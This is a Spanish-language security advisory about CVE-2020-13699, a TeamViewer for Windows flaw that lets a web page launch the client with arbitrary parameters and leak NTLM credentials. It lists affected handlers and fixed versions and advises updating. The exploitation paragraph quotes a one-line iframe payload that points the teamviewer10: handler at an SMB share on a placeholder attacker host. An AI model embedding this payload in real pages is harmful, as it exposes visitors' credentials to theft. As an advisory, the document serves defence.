Alertas

Vulnerabilidad de criticidad alta en TeamViewer para escritorio Windows

A día 30 de Julio de 2020, se publicó una vulnerabilidad para la versión de escritorio de Windows de TeamViewer que permitiría a un atacante lanzar a ejecución dicha aplicación, con parámetros arbitrarios.
30 Jul 2020
1 Minutos de lectura

ANÁLISIS

La vulnerabilidad que ha sido catalogada como CVE-2020-13699, y cuenta con un CVSS3 de 8.8[1], permitiría a un atacante lanzar a ejecución TeamViewer con parámetros arbitrarios y forzar el envío de una solicitud de autenticación con NTLM que podría posteriormente derivar en el robo de credenciales.

La vulnerabilidad está presente en  teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. Ha sido resuelta para las versiones 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.

Para explotar la vulnerabilidad el atacante tan solo tiene que incrustar un elemento "iframe" en una página web (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>). Una vez la víctima accede a este enlace, el cliente de escritorio Windows de TeamViewer arrancará abriendo también un SMB share.[3][4]

El proveedor ya ha publicado una actualización que permite solventar la vulnerabilidad.

RECOMENDACIONES

Se recomienda aplicar la solución publicada por el proveedor, actualizando a la versión más reciente que solvente la vulnerabilidad [1]

 

REFERENCIAS

[1]https://nvd.nist.gov/vuln/detail/CVE-2020-13699
[2]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699
[3]https://thehackernews.com/2020/08/teamviewer-password-hacking.html
[4]https://jeffs.sh/CVEs/CVE-2020-13699.txt
[5]https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448#

71 visitas